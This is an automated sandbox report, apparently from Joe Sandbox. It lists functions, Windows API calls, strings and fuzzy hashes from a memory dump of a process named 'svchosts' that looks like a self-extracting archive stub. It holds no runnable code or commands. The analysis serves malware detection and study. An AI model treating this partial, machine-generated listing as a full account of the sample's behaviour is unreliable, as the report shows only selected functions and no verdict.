Function 00297574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00297579

Part of subcall function 00293B3D: __EH_prolog.LIBCMT ref: 00293B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00297640

Part of subcall function 00297BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00297C04
Part of subcall function 00297BF5: GetLastError.KERNEL32 ref: 00297C4A
Part of subcall function 00297BF5: CloseHandle.KERNEL32(?), ref: 00297C59

Strings

SeRestorePrivilege, xrefs: 002975D3
SeSecurityPrivilege, xrefs: 002975BE

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 680a256a1f3259d4a1b9015c848cddf5c809341054aad3947f0120d5d4031daf
Instruction ID: d2237f063d153d3ab4478b3b124e0da1869f9dc6945be425163c80326d0584e4
Opcode Fuzzy Hash: 680a256a1f3259d4a1b9015c848cddf5c809341054aad3947f0120d5d4031daf
Instruction Fuzzy Hash: AC31A171924249AFDF20EF68EC45BEEBBB9AF15354F004069F844A7152DB704964CB61

Function 002AA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

EndDialog.USER32(?,00000001), ref: 002AA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002AA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 002AA4E2

Strings

ASKNEXTVOL, xrefs: 002AA448

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 29d830e2a5090d70dc9b65fd6ebfa08a8d68ca456ad2e0723e07f84991091df5
Instruction ID: c8c3a5b2844433101bbe2a831f51ea8f322568f45a9128b32b1f352b03c3ac9e
Opcode Fuzzy Hash: 29d830e2a5090d70dc9b65fd6ebfa08a8d68ca456ad2e0723e07f84991091df5
Instruction Fuzzy Hash: 0B11B632264301AFDA219F68ED4DF763769EF4F750F100125F341971A1CBE19925DB26

Function 0029D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0029D22E
_strncpy.LIBCMT ref: 0029D278

Strings

@%s, xrefs: 0029D218
$%s, xrefs: 0029D223

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 4f899b5511adcdfd38eac8f5337db6d39b52f5d30605047d56ffbd03749a45fb
Instruction ID: bd3190780b55e16a969788a8848874adaee7229ae9daef1735f6521ba328ca96
Opcode Fuzzy Hash: 4f899b5511adcdfd38eac8f5337db6d39b52f5d30605047d56ffbd03749a45fb
Instruction Fuzzy Hash: 62219072860209ABDF20DFA4CC06FEE7BA8AF05300F044526FE1496192E371EA75EF51

Function 0029B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0029B51E

Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D

_wcschr.LIBVCRUNTIME ref: 0029B53C
_wcschr.LIBVCRUNTIME ref: 0029B54C

Strings

%c:\, xrefs: 0029B514

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: df0c6d76dc653d6e80351b41c8b7d3b6665cc39241ef628d26ee036ec15e2cda
Instruction ID: 81dedb0bc06f9e304abce0f3467793491bbf5f157da3f527e9b605eaca52b88a
Opcode Fuzzy Hash: df0c6d76dc653d6e80351b41c8b7d3b6665cc39241ef628d26ee036ec15e2cda
Instruction Fuzzy Hash: 96014E53920312B6CF31AF74AC82DABB7ACDE953A07D18506F844C6441FB20D470C7A1

Function 002A06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A06F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A070D

Strings

Thread pool initialization failed., xrefs: 002A0725

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: ba45d2249eee8a93333dface1530e4d2616150b418870c756759228d0b36742b
Instruction ID: 5e9024181a96212d6b877b246c477bab188c57b3dc8870531f7594d850cd7482
Opcode Fuzzy Hash: ba45d2249eee8a93333dface1530e4d2616150b418870c756759228d0b36742b
Instruction Fuzzy Hash: 3B1170B1510709AFC3315F66DCC8AABFBECEB99754F10482EF1DA82200DA716990CB50

Function 002AD38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 002AD3DE
REPLACEFILEDLG, xrefs: 002AD3C9, 002AD3FD

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: a11731944dfbae181065ee5fc19ecf2b4b817c73545f055baf935f0cbd454be7
Instruction ID: e1bc1660ddccf28686afb2237618a90fc7064a19a7f63c6cd2a0c43325c11949
Opcode Fuzzy Hash: a11731944dfbae181065ee5fc19ecf2b4b817c73545f055baf935f0cbd454be7
Instruction Fuzzy Hash: D801B171A2124AAFDB119F18FD48F963BA9E71A390B000466F506D2630DEB19C60EFA1

Function 002B91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002B9269
__alldvrm.LIBCMT ref: 002B946A
__alldvrm.LIBCMT ref: 002B948C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: 1f52378ed0d41a4bdbbdceab22781438914b6edc60a29926c92936968117caa5
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: BBA17B319207869FDB11CF68C8917EEBBF5EF56390F1441ADEA859B381C6389C92CB50

Function 0029A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002980B7,?,?,?), ref: 0029A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002980B7,?,?), ref: 0029A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002980B7,?,?,?,?,?,?,?,?), ref: 0029A416
CloseHandle.KERNEL32(?,?,00000000,?,002980B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0029A41D

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: f74e1f2117c0ae48c3af45eeeace2a2e13c0bc6bf9da345d10bc891ac4f2dd77
Instruction ID: 740fd281b6e002ad1cfe2dd5492eb064f4c2ca6cf75d68fe73b273d0050ec8ce
Opcode Fuzzy Hash: f74e1f2117c0ae48c3af45eeeace2a2e13c0bc6bf9da345d10bc891ac4f2dd77
Instruction Fuzzy Hash: A241EE31268382ABEB31DF24DC45FEEBBE8AF81700F04095DB5D0D3181DA649A58DB93

Function 002BC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002B89AD,?,00000000,?,00000001,?,?,00000001,002B89AD,?), ref: 002BC0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BC16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002B67E2,?), ref: 002BC181
__freea.LIBCMT ref: 002BC18A

Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8fcb9e73055e7a7ef71295eb032044dbd82830b07ad313a9c54459996318aade
Instruction ID: 654b07107e4f4e93800ee7b22577128a8548ebcedbc9ae570d4c06b29c10b935
Opcode Fuzzy Hash: 8fcb9e73055e7a7ef71295eb032044dbd82830b07ad313a9c54459996318aade
Instruction Fuzzy Hash: 6831F272A2010AABDF24DF69DC45DEE7BA9EB40350F254128FC18E7151EB35DD60CBA0

Function 002A9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002A9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 002A9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A9DDB
ReleaseDC.USER32(00000000,00000000), ref: 002A9DE9

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5cf4c4c61df8bc066118bb8509a2d81cd326b5ce53f25ade2585407fed1ecd8c
Instruction ID: f7d6fdb0f9ee6d2ded93092e6cef155f170eeaaf8a2690376027b20b4d137f0e
Opcode Fuzzy Hash: 5cf4c4c61df8bc066118bb8509a2d81cd326b5ce53f25ade2585407fed1ecd8c
Instruction Fuzzy Hash: A4E0EC32986A22E7D3605BA5BC0DBAB3B58EB1A7A2F054029F60596290DE704849CF95

Function 002B2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002B2016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002B201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 002B2020

Part of subcall function 002B310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002B311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002B2035

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 27c00f090c02dca9b12f1bfdc9617fba60da03d8c3eec96166bb97165d2d4470
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: D1C04C24034745D41C11BEBA32022FD17580C727D4BD269C2E8C417103DE46067E9E72

Function 002A9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 002A9DF1: GetDC.USER32(00000000), ref: 002A9DF5
Part of subcall function 002A9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002A9E00
Part of subcall function 002A9DF1: ReleaseDC.USER32(00000000,00000000), ref: 002A9E0B

GetObjectW.GDI32(?,00000018,?), ref: 002A9F8D

Part of subcall function 002AA1E5: GetDC.USER32(00000000), ref: 002AA1EE
Part of subcall function 002AA1E5: GetObjectW.GDI32(?,00000018,?), ref: 002AA21D
Part of subcall function 002AA1E5: ReleaseDC.USER32(00000000,?), ref: 002AA2B5

Strings

(, xrefs: 002AA0A3

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 926bb89ec401e289c0f25e4b53ea6b6c3c90c4f93f782c532271b0edd61aa78d
Instruction ID: b1a47023aa84470cead69bfdeab9bf356253ed44ef5aa6c4e02121abcb17d10c
Opcode Fuzzy Hash: 926bb89ec401e289c0f25e4b53ea6b6c3c90c4f93f782c532271b0edd61aa78d
Instruction Fuzzy Hash: B68122B1218314AFC614DF68D848E2ABBF9FF89700F00891DF98AD7260DB31AD05CB52

Function 002A0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 002A0FF1

Strings

%ls, xrefs: 002A0E76, 002A0E8C
%s: %s, xrefs: 002A1000

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 81a0fa6412cf03ab7bd3e15104e2260b979c54c6d375452227699f706b7a45bf
Instruction ID: a983d619bd3d188f56e5b693206f0ac584f6e7f5c09b6edb3d7b82bef2994644
Opcode Fuzzy Hash: 81a0fa6412cf03ab7bd3e15104e2260b979c54c6d375452227699f706b7a45bf
Instruction Fuzzy Hash: 5651C8315BC740FFEA311AA4CE92F367655AB17B01F204906BBDA748D5CED25470BA12

Function 0029772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00297730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002978CC

Part of subcall function 0029A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A458
Part of subcall function 0029A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A489

Strings

:, xrefs: 002977A1

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 687fe186056b6f4f9bd354ff68936bea3e3b831d4acc2ee52a824b7072e16c14
Instruction ID: 105c8994c090585eecbd8acc4f264c9415372c9c9aaae3a1ea1da38d2ec45acf
Opcode Fuzzy Hash: 687fe186056b6f4f9bd354ff68936bea3e3b831d4acc2ee52a824b7072e16c14
Instruction Fuzzy Hash: 6241A671824218AAEF20EB54CD59EEEB37CEF41300F0040EAB609A3092DB745FA4DF61

Function 0029B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0029B6BE, 0029B6FA, 0029B75B, 0029B7AE
UNC, xrefs: 0029B708

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 40fd7c82f106210226f50ae96d9cb8cac07c49f53b63b895105f63fde960a7ee
Instruction ID: 9362191846118430a8a49fd14a215e34b6a57dc22f4189415f8d1514018ccf2a
Opcode Fuzzy Hash: 40fd7c82f106210226f50ae96d9cb8cac07c49f53b63b895105f63fde960a7ee
Instruction Fuzzy Hash: EF41273642021ABACF22AFA1ED41EEBB76DAF41750F004635F844D7152E770D970CE60

Function 002A8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 002A8FC4

Strings

about:blank, xrefs: 002A9082
Shell.Explorer, xrefs: 002A8FEF

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 53717f12db01d406b02ee01c7ae5c930278353f443ecc973d0ea60caf2add3c7
Instruction ID: 49d246d1cd6aadcfd929d4eacf61d0334a57ee55ef80b877d33f158e7423fa8a
Opcode Fuzzy Hash: 53717f12db01d406b02ee01c7ae5c930278353f443ecc973d0ea60caf2add3c7
Instruction Fuzzy Hash: 3A217E712243059FDB18EF65D895A2A77A8FF4A711B14C56EF8098B282DF70EC61CF60

Function 002AD44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010450,002AA990,?,?), ref: 002AD4C5

Strings

xj., xrefs: 002AD4D5
GETPASSWORD1, xrefs: 002AD4BA

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

